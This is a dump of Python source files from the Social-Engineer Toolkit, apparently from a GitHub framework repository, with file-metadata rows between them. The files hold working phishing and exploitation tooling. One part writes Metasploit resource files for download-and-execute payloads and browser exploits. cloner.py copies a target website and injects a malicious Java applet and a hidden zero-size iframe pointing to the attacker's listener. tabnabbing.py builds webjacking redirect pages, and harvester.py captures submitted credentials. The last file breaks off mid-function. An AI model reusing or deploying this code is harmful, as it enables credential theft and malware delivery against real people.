print("You selected the download and execute payload. Enter the URL to your executable.")
print("Example would be http://172.16.32.129/malicious.exe")
set_url = input(setprompt(["4"], "URL to the executable"))
filewrite.write("set URL %s" % (set_url) + "\n")
# if it isn't used for webdav then redirect to metasploit iframe
# configuration setting
if exploit != 'windows/browser/ms10_042_helpctr_xss_cmd_exec':
if exploit != 'windows/browser/ms10_046_shortcut_icon_dllloader':
if exploit != 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT %s" % (metasploit_iframe) + "\n")
# if webdav is needed for exploit, change base port
if exploit == 'windows/browser/ms10_042_helpctr_xss_cmd_exec':
filewrite.write("set SRVPORT 80" + "\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
if exploit == 'windows/browser/ms10_046_shortcut_icon_dllloader':
filewrite.write("set SRVPORT 80" + "\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
if exploit == 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT 80" + "\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
extension = input(
setprompt(["4"], "Extension types for this exploit [all]"))
if extension == '':
filewrite.write(
"set EXTENSIONS p7c wab ppt pptx zip vsd docx grp snag wbcat eml odp pot ppsx htm html" + "\n")
else:
filewrite.write("set EXTENSIONS %s" % (extension) + "\n")
filewrite.write("set ExitOnSession false\n")
# if we are using multiple meterpreter multiscripts
if meterpreter_multi == "ON":
multiwrite = open(userconfigpath + "multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write(
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
multiwrite.close()
# auto migration
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
# close webdav file if it was turned on
if webdav_enabled == "on":
webdav_write.close()
# this basically sets a flag we need to make some custom changes in web_server.py to get
# the docbase exploit to work properly
if exploit == ("windows/browser/java_docbase_bof"):
filewrite = open(userconfigpath + "docbase.file", "w")
filewrite.write("DOCBASE=ON")
filewrite.close()
| 6,833 | Python | .py | 153 | 40.339869 | 359 | 0.690283 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,811 | cloner.py | CHEGEBB_africana-framework/externals/set/src/webattack/web_clone/cloner.py | #!/usr/bin/env python3
#
# This file clones a website for SET to use in conjunction with the java
# applet attack.
#
from src.core.setcore import *
import subprocess
import os
import sys
import time
import re
import shutil
import urllib
# needed for python3
try: import urllib.request
except ImportError:
import urllib2
pass
operating_system = check_os()
definepath = os.getcwd()
sys.path.append("/etc/setoolkit")
from set_config import USER_AGENT_STRING as user_agent
from set_config import WEB_PORT as web_port
from set_config import JAVA_ID_PARAM as java_id
from set_config import JAVA_REPEATER as java_repeater # Boolean
from set_config import JAVA_TIME as java_time
from set_config import METASPLOIT_IFRAME_PORT as metasploit_iframe
from set_config import AUTO_REDIRECT as auto_redirect # Boolean
from set_config import UNC_EMBED as unc_embed # Boolean
sys.path.append(definepath)
track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = eval(input("Enter your IP address: "))
update_options("IPADDR=" + ipaddr)
# Define base value
site_cloned = True
# GRAB DEFAULT PORT FOR WEB SERVER
meterpreter_iframe = "8080"
# make dir if needed
if not os.path.isdir(userconfigpath + "web_clone/"):
os.makedirs(userconfigpath + "web_clone")
# if we used a proxy configuration from the set-proxy
if os.path.isfile(userconfigpath + "proxy.confg"):
fileopen = open(userconfigpath + "proxy.config", "r")
proxy_config = fileopen.read().rstrip()
# just do a ls
if not os.path.isfile(userconfigpath + "proxy.confg"):
proxy_config = "ls"
# if counter == 0: web_port=80
webdav_meta = 0
# see if exploit requires webdav
try:
fileopen = open(userconfigpath + "meta_config", "r")
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT %s" % (metasploit_iframe), line)
if not match2:
webdav_meta = 80
except:
pass
template = ""
# Grab custom or set defined
fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("TEMPLATE=", line)
if match:
line = line.split("=")
template = line[1]
# grab attack_vector specification
attack_vector = ""
if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(userconfigpath + "attack_vector", "r").readlines()
for line in fileopen:
attack_vector = line.rstrip()
# generate a random string for obfsucation we will do the same for nix and
# mac bins
# windows executable random name
rand_gen_win = generate_random_string(6, 15)
# mac elf binary random name
rand_gen_mac = generate_random_string(6, 15)
# nix elf binary random name
rand_gen_nix = generate_random_string(6, 15)
# randomize name for java applet
rand_gen_applet = generate_random_string(6, 15) + ".jar"
# update the SET options
update_options("APPLET_NAME=" + rand_gen_applet)
try:
# open our config file that was specified in SET
fileopen = open(userconfigpath + "site.template", "r").readlines()
# start loop here
url_counter = 0
for line in fileopen:
line = line.rstrip()
# look for config file and parse for URL
match = re.search("URL=", line)
if match:
# replace the URL designator with nothing
line = line.replace("URL=", "")
# define url to clone here
url = line.rstrip()
# if we aren't using multi attack with templates do this
if url != "NULL":
if template != "SET":
print((bcolors.YELLOW + "\n[*] Cloning the website: " + (url)))
print(("[*] This could take a little bit..." + bcolors.ENDC))
# clone the website
if template != "SELF":
# clean up old stuff
# set counter
counter = 0
# try except block in case no internet connection, route to Internet,
# etc.
try:
# check if we have wget, if we don't then use urllib2 - special thanks to chrismaddalena for the pull request!
# wget is called, but output is sent to devnull to hide "wget:
# missing URL" error
DNULL = open(os.devnull, 'w')
wget = subprocess.call(
'wget', shell=True, stdout=DNULL, stderr=subprocess.STDOUT)
if wget == 1:
if check_config("WGET_DEEP").lower() == "on":
subprocess.Popen('%s;wget -H -N -k -p -l 2 -nd -P %s/web_clone/ --no-check-certificate -U "%s" "%s";' %
(proxy_config, userconfigpath, user_agent, url), shell=True).wait()
else:
subprocess.Popen('%s;cd %s/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" "%s";' %
(proxy_config, userconfigpath, user_agent, url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
else:
# if we don't have wget installed we will use python to rip,
# not as good as wget
headers = {'User-Agent': user_agent}
# read in the websites
try:
req = urllib.request.Request(url, None, headers)
# read in the data from the initial request
html = urllib.request.urlopen(req).read()
# if length isnt much then we didnt get the site cloned
except AttributeError:
req = urllib.request.Request(url, headers=headers)
html = urllib.request.urlopen(req).read()
if len(html) > 1:
# if the site has cloned properly
site_cloned = True
# open file for writing
filewrite = open(userconfigpath + "web_clone/index.html", "w")
# write the data back from the request
filewrite.write(html)
# close the file
filewrite.close()
# if it failed ;(
except Exception as err:
print(err)
pass
# If the website did not clone properly, exit out.
if not os.path.isfile(userconfigpath + "web_clone/index.html"):
print((
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
return_continue()
site_cloned = False
# add file to let set interactive shell know it was unsuccessful
filewrite = open(userconfigpath + "cloner.failed", "w")
filewrite.write("failed")
filewrite.close()
if os.path.isfile(userconfigpath + "web_clone/index.html"):
fileopen = open(userconfigpath + "web_clone/index.html", "r", encoding='utf-8', errors='ignore')
counter = 0
for line in fileopen:
counter = counter + 1
if counter == 1 or counter == 0:
print((
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
return_continue()
site_cloned = False
os.remove(userconfigpath + "web_clone/index.html")
# add file to let set interactive shell know it was
# unsuccessful
filewrite = open(userconfigpath + "cloner.failed", "w")
filewrite.write("failed")
filewrite.close()
if site_cloned == True:
# make a backup of the site if needed
shutil.copyfile(userconfigpath + "web_clone/index.html",
userconfigpath + "web_clone/index.html.bak")
if site_cloned == True:
# if we specify UNC embedding
if unc_embed == True:
fileopen = open(userconfigpath + "web_clone/index.html", "r")
index_database = fileopen.read()
filewrite = open(userconfigpath + "web_clone/index.html", "w")
# Open the UNC EMBED
fileopen4 = open("src/webattack/web_clone/unc.database", "r")
unc_database = fileopen4.read()
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub(
"</body.*?>", unc_database + "\n</body>", index_database)
if not match:
index_database = re.sub(
"<head.*?>", "\n<head>" + unc_database, index_database)
filewrite.write(index_database)
filewrite.close()
# java applet attack vector
# check for java flag for multi attack
multi_java = False
if os.path.isfile(userconfigpath + "multi_java"):
multi_java = True
if attack_vector == "java" or multi_java:
# Here we parse through the new website and add our java applet code, its a hack for now
# Wrote this on the plane to Russia, easiest way to do this without
# internet access :P
print((
bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC))
# Read in newly created index.html
time.sleep(2)
if not os.path.isfile(userconfigpath + "web_clone/index.html"):
# trigger error that we were unable to grab the website :(
print_error(
"Unable to clone the website it appears. Email us to fix.")
sys.exit()
fileopen = open(userconfigpath + "web_clone/index.html", "r")
# Read add-on for java applet
fileopen2 = open("src/webattack/web_clone/applet.database", "r")
# Write to new file with java applet added
filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
fileopen3 = open("src/webattack/web_clone/repeater.database", "r")
# this is our cloned website
index_database = fileopen.read()
# this is our applet database
applet_database = fileopen2.read()
# this is our repeater database
repeater_database = fileopen3.read()
# here we begin replacing specifics in order to prep java applet
# payload
applet_database = applet_database.replace("msf.exe", rand_gen_win)
applet_database = applet_database.replace("mac.bin", rand_gen_mac)
applet_database = applet_database.replace("nix.bin", rand_gen_nix)
applet_database = applet_database.replace(
"RANDOMIZE1", rand_gen_applet)
update_options("MSF.EXE=%s\nMAC.BIN=%s\nNIX.BIN=%s" %
(rand_gen_win, rand_gen_mac, rand_gen_nix))
# close the file up
applet_database = applet_database.replace(
"ipaddrhere", ipaddr + ":" + str(web_port))
# set the java field
applet_database = applet_database.replace(
"IDREPLACEHERE", java_id, 2)
# set up everything for the unc path
if unc_embed == True:
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
# set up the java repeater
if java_repeater == True:
repeater_database = repeater_database.replace(
"IDREPLACEHERE", java_id, 2)
repeater_database = repeater_database.replace(
"TIMEHEREPLZ", java_time)
repeater_database = repeater_database.replace(
"URLHEREPLZ", url)
repeater_database = repeater_database.replace(
"RANDOMFUNCTION", generate_random_string(5, 15), 3)
# do a quick sanity check and make sure body is standard
index_database = re.sub("</BODY.*?>", "</body>", index_database)
index_database = re.sub("<HEAD.*?>", "<head>", index_database)
index_database = re.sub("<BODY.*?>", "<body>", index_database)
# start appending and prepping the index file
if java_repeater == True:
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub(
"<applet ", repeater_database + "\n<applet ", index_database)
if not match:
index_database = re.sub(
"<head.*?>", "\n<head>" + repeater_database, index_database)
counter = 0
# confirm we can find body
match = re.search("</body.*?>", index_database)
if match:
counter = 1
index_database = re.sub(
"</body.*?>", applet_database + "\n</body>", index_database)
if auto_redirect == True:
index_database = index_database.replace(
'<param name="9" value=""', '<param name="9" value="%s"' % (url))
if not match:
match = re.search("<head.*?>", index_database)
if match:
counter = 1
index_database = re.sub(
"<head.*?>", "\n<head>" + applet_database, index_database)
if auto_redirect == True:
index_database = index_database.replace(
'<param name="9" value=""', '<param name="9" value="%s"' % (url))
# start appending and prepping the index file
if java_repeater == True:
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub(
"<applet", repeater_database + "\n<applet ", index_database)
if not match:
index_database = re.sub(
"<head.*?>", "\n<head>" + repeater_database, index_database)
if counter == 0:
print_error("Unable to clone the website...Sorry.")
print_error(
"This is usally caused by a missing body tag on a website.")
print_error("Try a diferent site and attempt it again.")
sys.exit(1)
# write the file out
filewrite.write(index_database)
# close the file after done writing
filewrite.close()
print((bcolors.BLUE + "[*] Filename obfuscation complete. Payload name is: " + rand_gen_win + "\n[*] Malicious java applet website prepped for deployment\n" + bcolors.ENDC))
# if we are using HTA attack
if check_options("ATTACK_VECTOR") == "HTA":
if os.path.isfile(userconfigpath + "Launcher.hta"):
data1 = open(userconfigpath + "web_clone/index.html", "r").read()
data2 = open(userconfigpath + "hta_index", "r").read()
data3 = data1.replace("</body>", data2 + "</body>")
filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(data3)
filewrite.close()
print_status("Copying over files to Apache server...")
apache_dir = check_config("APACHE_DIRECTORY=")
if os.path.isdir(apache_dir + "/html"):
apache_dir = apache_dir + "/html"
shutil.copyfile(userconfigpath + "web_clone/index.html",
apache_dir + "/index.html")
shutil.copyfile(userconfigpath + "Launcher.hta",
apache_dir + "/Launcher.hta")
print_status("Launching Metapsloit.. Please wait one.")
subprocess.Popen("%smsfconsole -r %s/meta_config" %
(meta_path(), userconfigpath), shell=True).wait()
# selection of browser exploits
# check to see if multiattack is in use
multi_meta = "off"
if os.path.isfile(userconfigpath + "multi_meta"):
multi_meta = "on"
if attack_vector == "browser" or multi_meta == "on":
print((
bcolors.RED + "[*] Injecting iframes into cloned website for MSF Attack...." + bcolors.ENDC))
# Read in newly created index.html
if attack_vector == "multiattack":
if os.path.isfile(userconfigpath + "web_clone/index.html"):
os.remove(userconfigpath + "web_clone/index.html")
# check to see if the file is there first
if not os.path.isfile(userconfigpath + "web_clone/index.html.new"):
if os.path.isfile(userconfigpath + "web_clone/index.html.bak"):
shutil.copyfile(
userconfigpath + "web_clone/index.html.bak", userconfigpath + "web_clone/index.html.new")
if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
shutil.copyfile(
userconfigpath + "web_clone/index.html.new", userconfigpath + "web_clone/index.html")
time.sleep(1)
fileopen = open(userconfigpath + "web_clone/index.html", "r", encoding='utf-8', errors='ignore').readlines()
filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
counter = 0
for line in fileopen:
counter = 0
if attack_vector == "browser":
match = re.search(rand_gen_applet, line)
if match:
line = line.replace(rand_gen_applet, "invalid.jar")
filewrite.write(line)
counter = 1
match = re.search("<head.*?>", line, flags=re.IGNORECASE)
if match:
header = match.group(0)
match2 = re.search("<head.*?>", line, flags=re.IGNORECASE)
if match2:
header = match.group(0)
if webdav_meta != 80:
line = line.replace(
header, header + '<iframe src ="http://%s:%s/" width="0" height="0" scrolling="no"></iframe>' % (ipaddr, metasploit_iframe))
filewrite.write(line)
counter = 1
if webdav_meta == 80:
line = line.replace(
header, header + '<head><meta HTTP-EQUIV="REFRESH" content="4; url=http://%s">' % (ipaddr))
if counter == 0:
filewrite.write(line)
try:
filewrite.close()
except:
pass
print((
bcolors.BLUE + "[*] Malicious iframe injection successful...crafting payload.\n" + bcolors.ENDC))
if attack_vector == "java" or attack_vector == "browser" or attack_vector == "multiattack":
if not os.path.isfile(userconfigpath + "web_clone/%s" % (rand_gen_applet)):
shutil.copyfile("src/html/Signed_Update.jar.orig",
userconfigpath + "web_clone/%s" % (rand_gen_applet))
# move index.html to our main website
if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
shutil.move(userconfigpath + "web_clone/index.html.new",
userconfigpath + "web_clone/index.html")
# catch keyboard control-c
except KeyboardInterrupt:
print ("Control-C detected, exiting gracefully...\n")
exit_set()
| 20,114 | Python | .py | 405 | 36.671605 | 185 | 0.561447 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,812 | tabnabbing.py | CHEGEBB_africana-framework/externals/set/src/webattack/tabnabbing/tabnabbing.py | #!/usr/bin/env python3
import subprocess
import re
import urllib
import os
from src.core.setcore import *
#
# TabNabbing Source here
#
#
# pull the timing for SET CONFIG on webjacking
apache_check = check_config("APACHE_SERVER=").lower()
if apache_check == "on": apache_dir = check_config("APACHE_DIRECTORY=").lower()
webjacking_timing = check_config("WEBJACKING_TIME=")
# grab attack_vector specification
fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen:
attack_vector = line.rstrip()
# need to see if we created file to trigger multi attack webjacking
multi_webjacking = "off"
if os.path.isfile(userconfigpath + "multi_webjacking"):
multi_webjacking = "on"
# Open the IPADDR file
ipaddr = ""
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
# pull URL field so we can pull favicon later on
fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen:
match = re.search("URL=", line)
if match:
URL = line.replace("URL=", "")
if attack_vector == "tabnabbing":
URL = URL.replace("https://", "")
URL = URL.replace("http://", "")
URL = re.split("/", URL)
URL = URL[0]
URL = "http://" + URL
# move cloned site to index2.html
subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" %
(userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# grab the source and write it out to the cloned directory
fileopen = open("src/webattack/tabnabbing/source.js", "r")
# write it to dir
filewrite = open(userconfigpath + "web_clone/source.js", "w")
# loop
for line in fileopen:
line = line.rstrip()
match = re.search("URLHERE", line)
if match:
line = line.replace("URLHERE", URL)
filewrite.write(line + "\n")
filewrite.close()
if attack_vector == "tabnabbing":
# grab favicon
favicon = urllib.urlopen("%s/favicon.ico" % (URL))
output = open(userconfigpath + '/web_clone/favicon.ico', 'wb')
output.write(favicon.read())
output.close()
filewrite1 = open(userconfigpath + "web_clone/index.html", "w")
filewrite1.write(
'<head><script type="text/javascript" src="source.js"></script></head>\n')
filewrite1.write("<body>\n")
filewrite1.write("Please wait while the site loads...\n")
filewrite1.write("</body>\n")
filewrite1.close()
if apache_check == "on": shutil.copy(userconfigpath + "web_clone/source.js", apache_dir)
# define webjacking or multi webjacking here
if attack_vector == "webjacking" or multi_webjacking == "on":
filewrite1 = open(userconfigpath + "web_clone/index.html", "w")
filewrite1.write("<script>\n")
filewrite1.write("function a(){\n")
filewrite1.write(
'''a= window.open("http://%s/index2.html", "iframe", "");\n''' % (ipaddr))
filewrite1.write("}\n")
filewrite1.write("</script>\n")
filewrite1.write('''<a href="%s" onclick="t=setTimeout('a()', %s);" target="iframe"><h1>The site %s has moved, click here to go to the new location.</h1></a>\n''' %
(URL, webjacking_timing, URL))
filewrite1.close()
| 3,201 | Python | .py | 79 | 36.164557 | 168 | 0.666345 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,813 | report_generator.py | CHEGEBB_africana-framework/externals/set/src/webattack/harvester/report_generator.py | #!/usr/bin/env python3
import re
import subprocess
import os
import datetime
from src.core.setcore import *
# make sure the reports directory is created
if not os.path.isdir(userconfigpath + "reports/"): os.makedirs(userconfigpath + "reports/")
#
# Quick report generation script
#
# Colors below
class bcolors:
PURPLE = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
PINK = '\033[95m'
ENDC = '\033[0m'
# End colors
# definepath
definepath = os.getcwd()
# grab URL and report information
now = datetime.datetime.today()
fileopen = open(userconfigpath + "site.template", "r")
site_template = open(userconfigpath + "site.template", "r").readlines()
fileopen1 = open("%s/src/core/reports/index.html" % (definepath), "r")
for line in fileopen:
match = re.search("URL=", line)
if match:
url = line.replace("URL=http://", "")
url = line.replace("URL=https://", "")
filewrite2 = open(userconfigpath + "reports/%s.xml" % (now), "a")
filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n")
filewrite2.write(r"<harvester>" + "\n")
for line2 in fileopen1:
counter = 0
#filewrite = open(userconfigpath + "reports/%s.html" % (now), "a")
match1 = re.search("REPLACEHEREDUDE", line2)
if match1:
line2 = line2.replace("REPLACEHEREDUDE", url)
#filewrite.write(line2)
url_xml = url.rstrip()
filewrite2.write(" %s" % (url_xml) + "\n")
counter = 1
match2 = re.search("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", line2)
if match2:
line2 = line2.replace(
"If this is blank, SET did not get a successful attempt on the website, sorry hoss..", "Report findings on %s<br><br>" % (url))
counter = 1
#filewrite.write(line2)
opentag = True
for line3 in site_template:
match3 = re.search("PARAM:", line3)
if match3:
xml = line3.replace("PARAM: ", "")
xml = xml.rstrip()
#filewrite.write(line3 + "<br>")
if opentag:
filewrite2.write(r" <url>")
opentag = False
filewrite2.write(
r" <param>%s</param>" % (xml) + "\n")
match4 = re.search("BREAKHERE", line3)
if match4:
filewrite2.write(" </url>" + "\n")
opentag = True
#filewrite.write(
# "<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>")
# look for how many people visited the website
match5 = re.search("VISITORSHERE", line2)
if match5:
if os.path.isfile(userconfigpath + "visits.file"):
fileopen3 = open(userconfigpath + "visits.file", "r")
counter5 = 0
for line in fileopen3:
if line != "":
line = line.rstrip()
counter5 = counter5 + 1
if line == "":
counter5 = 0
if not os.path.isfile(userconfigpath + "visits.file"):
counter5 = 0
line2 = line2.replace("VISITORSHERE", str(counter5), 2)
counter = 1
# filewrite.write(line2)
match6 = re.search("BITESHERE", line2)
if match6:
if os.path.isfile(userconfigpath + "bites.file"):
fileopen4 = open(userconfigpath + "bites.file", "r")
counter5 = 0
for line in fileopen4:
line = line.rstrip()
counter5 = counter5 + 1
if not os.path.isfile(userconfigpath + "bites.file"):
counter5 = 0
line2 = line2.replace("BITESHERE", str(counter5))
counter = 1
#filewrite.write(line2)
#if counter == 0:
#filewrite.write(line2)
try:
#filewrite.close()
filewrite2.write(r"</harvester>" + "\n")
filewrite2.close()
except:
pass
subprocess.Popen("cp -rf %s/src/core/reports/files %sreports/" % (definepath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print(bcolors.BLUE + "[*] File in XML format exported to %sreports/%s.xml for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC)
| 4,831 | Python | .py | 110 | 30.772727 | 161 | 0.510308 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,814 | harvester.py | CHEGEBB_africana-framework/externals/set/src/webattack/harvester/harvester.py | #!/usr/bin/env python3
import subprocess
import sys
import os
import re
import cgi
import posixpath
import mimetypes
import urllib.parse
import shutil
import html
# I am Swam Htet Aung I repair some error in this code for python latest versions
# need for python2 -> 3
try:
from http.server import *
except ImportError:
from BaseHTTPServer import *
import socket
# needed for python2 -> 3
try:
from SocketServer import *
import SocketServer
except ImportError:
from socketserver import *
import socketserver
import threading
import datetime
import shutil
# get path to normal
definepath = os.getcwd()
sys.path.append(definepath)
from src.core.setcore import *
sys.path.append("/etc/setoolkit")
from set_config import APACHE_SERVER as apache_check
from set_config import WEBATTACK_EMAIL as webattack_email
from set_config import TRACK_EMAIL_ADDRESSES as track_email
from set_config import HARVESTER_LOG as logpath
sys.path.append(definepath)
if track_email == True:
print_status("You have selected to track user accounts, Apache will automatically be turned on to handle tracking of users.")
apache_check = True
############################################
# Credential harvester #
############################################
# define the current working directory
definepath = os.getcwd()
me = mod_name()
# append python to our current working directory
sys.path.append(definepath)
if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())):
filewrite = open("%s/src/logs/harvester.log" % (os.getcwd()), "w")
filewrite.write("")
filewrite.close()
# import the base setcore libraries
from src.core.setcore import *
# detect openssl module
try:
# from OpenSSL import SSL
from OpenSSL import SSL
# handle import error that openssl is not there
except Exception as err:
# print("Python OpenSSL wasn't detected or PEM file not found, note that SSL compatibility will be affected.")
# print_status("Printing error: " + str(err))
pass
attack_vector = ""
fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen:
line = line.rstrip()
if line == 'multiattack':
attack_vector = 'multiattack'
# if attack vector isnt the multiattack
if attack_vector != "multiattack":
print(bcolors.RED + """
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.""" + bcolors.ENDC)
# see if we're tabnabbing or multiattack
homepath = os.getcwd()
# pull scraper
try:
module_reload(src.webattack.harvester.scraper)
except:
import src.webattack.harvester.scraper
# GRAB DEFAULT PORT FOR WEB SERVER AND CHECK FOR COMMAND CENTER
command_center = "off"
fileopen = open("/etc/setoolkit/set.config", "r").readlines()
counter = 0
for line in fileopen:
line = line.rstrip()
match = re.search("WEB_PORT=", line)
if match:
line = line.replace("WEB_PORT=", "")
web_port = line
counter = 1
match2 = re.search("COMMAND_CENTER=ON", line)
if match2:
command_center = "on"
command_center_write = open(
userconfigpath + "cc_harvester_hit" % (userconfigpath), "w")
# if nada default port 80
if counter == 0:
web_port = 80
# pull URL field
counter = 0
fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("URL=", line)
if match:
RAW_URL = line.replace("URL=", "")
URL = line.replace("URL=http://", "")
URL = line.replace("URL=https://", "")
counter = 1
# this checks the set_config to see if we need to redirect to a different
# website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=")
if harvester_redirect.lower() == "on":
URL = check_config("HARVESTER_URL=")
counter = 1
if counter == 0:
URL = ''
# set ssl flag to false by default (counter basically)
ssl_flag = "false"
self_signed = "false"
# SEE IF WE WANT TO USE SSL
fileopen = open("/etc/setoolkit/set.config", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("WEBATTACK_SSL=ON", line)
if match:
# if we hit on ssl being on, set flag to true
ssl_flag = 'true'
# if flag is true begin prepping SSL stuff
if ssl_flag == 'true':
# set another loop for find other variables we need for SSL setup
for line in fileopen:
# strip line feeds and carriage returns
line = line.rstrip()
# begin search for flags we need
match = re.search("SELF_SIGNED_CERT=ON", line)
# if we hit, lets create our own certificate
if match:
self_signed = "true"
# need to import our ssl module for creating a CA
sys.path.append("src/core/ssl")
# import our ssl module
import setssl
subprocess.Popen("cp %s/CA/*.pem %s" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# remove old junk we dont need anymore
subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# if user wants to specify his/her own PEM certificate
if self_signed == "false":
for line in fileopen:
line = line.rstrip()
# search for cert path
match = re.search("PEM_CLIENT=", line, flags=re.IGNORECASE)
if match:
pem_client = line.replace("PEM_CLIENT=", "")
if not os.path.isfile(pem_client):
print("\nUnable to find PEM file, check location and config again.")
exit_set()
if os.path.isfile(pem_client):
subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
match2 = re.search("PEM_SERVER=", line)
if match2:
pem_server = line.replace("PEM_SERVER=", "")
if not os.path.isfile(pem_server):
print("\nUnable to find PEM file, check location and config again.")
exit_set()
if os.path.isfile(pem_server):
subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# url decode for postbacks
def htc(m):
return chr(int(m.group(1), 16))
# url decode
def urldecode(url):
url = url.decode('utf-8')
rex = re.compile('%([0-9a-hA-H][0-9a-hA-H])', re.M)
return rex.sub(htc, url)
# here is where we specify how many people actually visited versus fell for it
visits = open(userconfigpath + "visits.file", "a")
bites = open(userconfigpath + "bites.file", "a")
# SET Handler for handling POST requests and general setup through SSL
class SETHandler(BaseHTTPRequestHandler):
extensions_map = _encodings_map_default = {
'.gz': 'application/gzip',
'.Z': 'application/octet-stream',
'.bz2': 'application/x-bzip2',
'.xz': 'application/x-xz',
}
def setup(self):
# added a try except block in case of transmission errors
try:
self.connection = self.request
self.rfile = socket.SocketIO(self.request, "rb")
self.wfile = socket.SocketIO(self.request, "wb")
# except errors and pass them
except:
pass
def translate_path(self, path, webroot):
"""Translate a /-separated PATH to the local filename syntax.
Components that mean special things to the local file system
(e.g. drive or directory names) are ignored. (XXX They should
probably be diagnosed.)
"""
# abandon query parameters
path = path.split('?',1)[0]
path = path.split('#',1)[0]
# Don't forget explicit trailing slash when normalizing. Issue17324
trailing_slash = path.rstrip().endswith('/')
try:
path = urllib.parse.unquote(path, errors='surrogatepass')
except UnicodeDecodeError:
path = urllib.parse.unquote(path)
path = posixpath.normpath(path)
words = path.split('/')
words = filter(None, words)
path = webroot
for word in words:
if os.path.dirname(word) or word in (os.curdir, os.pardir):
# Ignore components that are not a simple file/directory name
continue
path = os.path.join(path, word)
if trailing_slash:
path += '/'
return path
def guess_type(self, path):
"""Guess the type of a file.
Argument is a PATH (a filename).
Return value is a string of the form type/subtype,
usable for a MIME Content-type header.
The default implementation looks the file's extension
up in the table self.extensions_map, using application/octet-stream
as a default; however it would be permissible (if
slow) to look inside the data to make a better guess.
"""
base, ext = posixpath.splitext(path)
if ext in self.extensions_map:
return self.extensions_map[ext]
ext = ext.lower()
if ext in self.extensions_map:
return self.extensions_map[ext]
guess, _ = mimetypes.guess_type(path)
if guess:
return guess
return 'application/octet-stream'
def copyfile(self, source, outputfile):
"""Copy all data between two file objects.
The SOURCE argument is a file object open for reading
(or anything with a read() method) and the DESTINATION
argument is a file object open for writing (or
anything with a write() method).
The only reason for overriding this would be to change
the block size or perhaps to replace newlines by CRLF
-- note however that this the default server uses this
to copy binary data as well.
"""
shutil.copyfileobj(source, outputfile)
# handle basic GET requests
def do_GET(self):
# import proper style css files here
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
#print('-' * 40)
#print('Exception happened during processing of request from', end=' ')
print(client_address)
#import traceback
#traceback.print_exc() # XXX But this goes to stderr!
#print('-' * 40)
pass
